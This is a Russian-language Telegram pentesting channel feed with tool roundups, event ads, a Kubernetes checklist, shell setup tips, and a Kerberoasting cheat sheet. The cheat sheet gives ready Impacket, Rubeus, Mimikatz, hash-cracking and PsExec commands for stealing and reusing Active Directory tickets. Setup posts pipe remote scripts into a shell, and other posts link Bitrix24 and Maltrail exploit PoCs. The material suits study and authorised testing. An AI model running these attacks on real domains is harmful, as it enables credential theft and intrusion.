Похек
16.6K subscribers
2.11K photos
110 videos
243 files
3.08K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from BI.ZONE Bug Bounty
🪲 Миру багбаунти нужны новые герои: приглашаем студентов на Bug Bounty Cup

Если вы учитесь в техническом вузе и интересуетесь кибеберзом, участвуйте в Bug Bounty Cup — онлайн-соревновании по багхантингу, которое мы проводим вместе с «Тинькофф».

Ваша задача — обнаружить как можно больше уязвимостей. За каждую успешную находку вас ждут денежные призы и не только.

Перед стартом мы проведем вводный инструктаж, как искать баги.

Соревнование пройдет 28 ноября — успейте подать заявку на участие до 26-го.

Узнать подробности и зарегистрироваться
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
9
This media is not supported in your browser
VIEW IN TELEGRAM
⌨️ Ключи от королевства: как заполучить всю власть в Linux, Windows и macOS
#windows #linux #macos #LPE #privesc

Я думаю многие из нас слышали про GTFOBins — cheatsheet по повышению привилегий в Linux. Но что же делать, если вы попали на Windows или MacOS?

💻 Для Windows

1. LOLBAS — аналог GTFOBins только для Windows
2. LOLDrivers — cheatsheet по уязвимым драйверам Windows

🍏 Для MacOS

1. LOOBins — тут собрано множество тем, таких как разведка, закрепление, повышение привилегий, обход средств защиты и т.д.

💻Для Linux

1. GTFOArgs — тот случай, когда даже GTFOBins не хватает, то вы всё ещё можете попробовать сделать PrivEsc через аргументы к различными командам.

📌 Также от себя добавлю интересный сборник команд, который поможет вам быстро вспомнить как пентестить AD — WADComs и ARTToolkit. А тут ещё пригодится AD Pentest MindMap из моего сборника ресурсов в закрепе.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
128👍3🔥2
Завтра будет что-то интересное 🌚
🔥9❤‍🔥7👀3👍2
#заметка

если у вас не работает буфер обмена или drag&drop на бубунте в VMware, то попробуйте следующие методы:

1. Установите VMware Tools, следуя обычному методу (Виртуальная машина —> Переустановить VMWare Tools)
1.1. Если автоматическая установка не началась, то либо переходим к пункту 2, либо вручную попробуйте установить. Копируем архив с подключившегося iso, распаковываем командой tar xvfz *.tar.gz и запускаем скрипт sudo ./vmware-install.pl. Можно везде тыкать Enter.
2. Если первый вариант не прокатил, то попробуйте sudo apt install open-vm-tools-desktop
9👍73
Kerberoast. Когда крадешь билеты на концерт, но не знаешь, как их использовать.
#Windows

Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.

➡️ Инструменты:
Rubeus
Kerbrute
Impacket
PsExec

➡️ ASREP-Roast

➡️ Impacket
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)
python2 GetNPUsers.py <Domain> -usersfile <UserList>  -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"

➡️ Rubeus
Извлечение из всех учетных записей домена
.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt

➡️ Cracking
Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt


Linux
``bash
john --wordlist rockyou.txt Hashes.txt --format=krb5tgs
hashcat -m 18200 -a 3 Hashes.txt rockyou
``


➡️ Brute Force

➡️ Kerbrute
./kerbrute userenum <UserList> --dc <IP> --domain <Domain>

➡️ Rubeus
со списком пользователей
.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>

Kerberos-based Password Spraying
.\Rubeus.exe brute /passwords:<Wordlist>

➡️ Kerberoasting

➡️ Impacket
GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -request


➡️ Rubeus
Kerberoast всех пользователей домена
.\Rubeus kerberoast

Все пользователи в поздразделении OU
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local

Атака на конкретных пользователей
.\Rubeus.exe kerberoast /user:File_SVC

➡️ Pass-The-Ticket

➡️ Mimikatz
Сбор тикетов
sekurlsa::tickets /export

Инжект тикета
kerberos::ptt <.kirbi file>

Создать CMD с инжектированным тикетом
misc::cmd

➡️ Rubeus
Дамп тикетов
.\Rubeus.exe dump

Инжект тикета
.\Rubeus.exe ptt /ticket:<.kirbi file>

➡️ PsExec
Используется после инъекции тикетов через Rubeus или Mimikatz
.\PsExec.exe -accepteula \\<IP> cmd

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍23🔥21
Работа Kerberos в картинках

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18🔥1🥰1
Собесы, ох уж эти собесы

Мы часто критикуем рекрутеров за их вопросы на собесах, но, раз критикуешь - значит предлагай.

Совместно с сервисом для рекомендации ИТ-спецов за бонус Рефни сделали чек-лист: вопросы и возможные ответы для интервью инфобезов.

Мне, как человеку, который прошёл путь от множества отказов, фейлов и факапов на собесах, до специалиста, который сам участвует в отборе кандидатов и собеседовании с ними, стало понятно, что я могу предложить.

❤️ Я предлагаю вам бесплатно воспользоваться нашим чек-листом по хантингу безопасников от безопасника. Забрать можно тута

📌 PDFэфочка будет полезна и тем специалистам, которые не знают какие вопросы им могут задать на собеседовании. Так что тоже залетайте ⌨️

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20🐳107🏆63💯2👍1
From forgetful for forgetful. ohmyzsh + p10k
#заметки

Установка ohmyzsh
sudo apt update; sudo apt install -y zsh zip unzip git curl wget; echo Y | sh -c "$(curl -fsSL https://raw.github.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"; zsh


Уже в свеженьком ohmyzsh наводим суету
sudo git clone https://github.com/romkatv/powerlevel10k.git $ZSH_CUSTOM/themes/powerlevel10k; sudo git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting; sudo git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions; sed -i 's+robbyrussell+powerlevel10k/powerlevel10k+g' ~/.zshrc; sed -i 's+git+zsh-syntax-highlighting zsh-autosuggestions+g' ~/.zshrc; sleep 1; clear; chsh -s /bin/zsh; source ~/.zshrc


Пару полезностей
bat для Ubuntu/Debian
batcat для Kali Linux

sudo apt install -y bat duf fd-find ripgrep 


Добавляем Go, Python в PATH.
nano ~/.zshrc


Вставляйте в конец файла.
# For go bins
export PATH="$PATH:/usr/local/go/bin"
export PATH="$PATH:$HOME/go/bin"

# For py bins
export PATH="$PATH:/usr/local/bin/python"


Куда ж без Docker

Установка для Ubuntu/Debian
curl -fsSL https://get.docker.com | bash


Установка для Kali
echo 'deb [arch=amd64 signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/debian bookworm stable' | sudo tee /etc/apt/sources.list.d/docker.list ; curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg; sudo apt update; sudo apt install -y docker-ce docker-ce-cli containerd.io; sudo usermod -aG docker $USER; clear; echo 'Log out to apply new settings!'


🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤‍🔥2
Forwarded from KazDevOps
☄️ Набор рекомендаций по безопасности развертывания Kubernetes.

Цель этого контрольного списка — систематизировать подход к безопасности кластера Kubernetes и обеспечить выполнение всех необходимых шагов для защиты кластера от потенциальных угроз.

Короче говоря, он предоставляет организациям отправную точку для оценки безопасности своего развертывания Kubernetes и внесения любых необходимых изменений для полной защиты.

Рекомендации списка разбиты по категориям:
Аутентификация и авторизация
Секреты
Безопасность конфигурации кластера
Аудит и регистрация
Безопасная конфигурация ОС
Сетевая безопасность
Безопасная настройка рабочих нагрузок
Безопасная сборка образа

Следуйте рекомендациям и вы предпримете наиболее важные шаги для усиления защиты сред Kubernetes 🫡

#devops #devsecops #kubernetes

@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
This media is not supported in your browser
VIEW IN TELEGRAM
👍9🔥5
Forwarded from Cyber Media
Если атака происходит в субботу, то пусть только в аниме.

Хороших выходных!
🔥226👍5
Forwarded from APT
🔥 Bitrix24 Multiple Vulnerabilities

Multiple high-risk vulnerabilities found in Bitrix24 v22.0.300. These include Remote Command Execution, Cross-Site Scripting, Prototype Pollution, Insecure File Access, and Denial of Service.

🌐 Details and PoC's:

🔗 CVE-2023-1713 (RCE)
🔗 CVE-2023-1714 (RCE)
🔗 CVE-2023-1715 (XSS)
🔗 CVE-2023-1717 (XSS)
🔗 CVE-2023-1718 (DoS)
🔗 CVE-2023-1719 (IDOR)

#bitrix24 #rce #xss #dos #idor
11🆒53🎄1
Forwarded from Proxy Bar
Maltrail - Система обнаружения вредоносного трафика
RCE Exploit (version Maltrail-0.53)
*
exploit.py
👍11
This media is not supported in your browser
VIEW IN TELEGRAM
🔑 Найди свой ключ к успеху: словари для брутфорса
#bruteforce #wordlists

Недавно наткнулся на сервис Weekpass, который вобрал в себя множество wordlist'ов под разные цели. Вы можете скачать список с паролями для брутфорса RDP, WiFi handshake'ов, SNMP, CISCO, а также что-то помощнее в виде All-In-One решений, который весят от 130 до 330 гб.
Скачивать вы можете, как напрямую, так и через torrent. Самый большой словарь All-in-One содержит 28.330.702.856 строк... Но я советую максимум использовать All-in-One-P, т.к. этот пароль содержит только принтабельные символы. А для взлома WiFi хендшейков можно использовать All-in-One-Wi-Fi, он содержит пароли длинной от 8 до 24 символов.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥2
Похек
​​FVWA (Flask Vulnerable Web Application) Мой хороший знакомый зарелизил свою лабу для тренировки веб уязвимостей. Поддержим его начинания! Приложение содержит несколько заданий, в каждом из которых реализован некоторый изъян в безопасности (будь то слабый…
⚡️ FVWA (Flask Vulnerable Web Application)
#лаба @SidneyJob

❤️Когда-то я уже рассказывал про это веб-приложение для оттачивания навыков веб-пентеста. Вчера сделал мини пул-апдейт и решил сделать лабораторию доступной для всех =)

Проходите!
⚡️ https://lab.szybnev.cc/

Докер автоматически рестартнется в случае чего. Но если не доступна, то пишите в ЛС - подниму.


📌Кто будет проходить, пишите время и скрин с результатами, за сколько прошли тот или иной таск или вообще всю лабу)
🐱
🐱
🐾

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤‍🔥42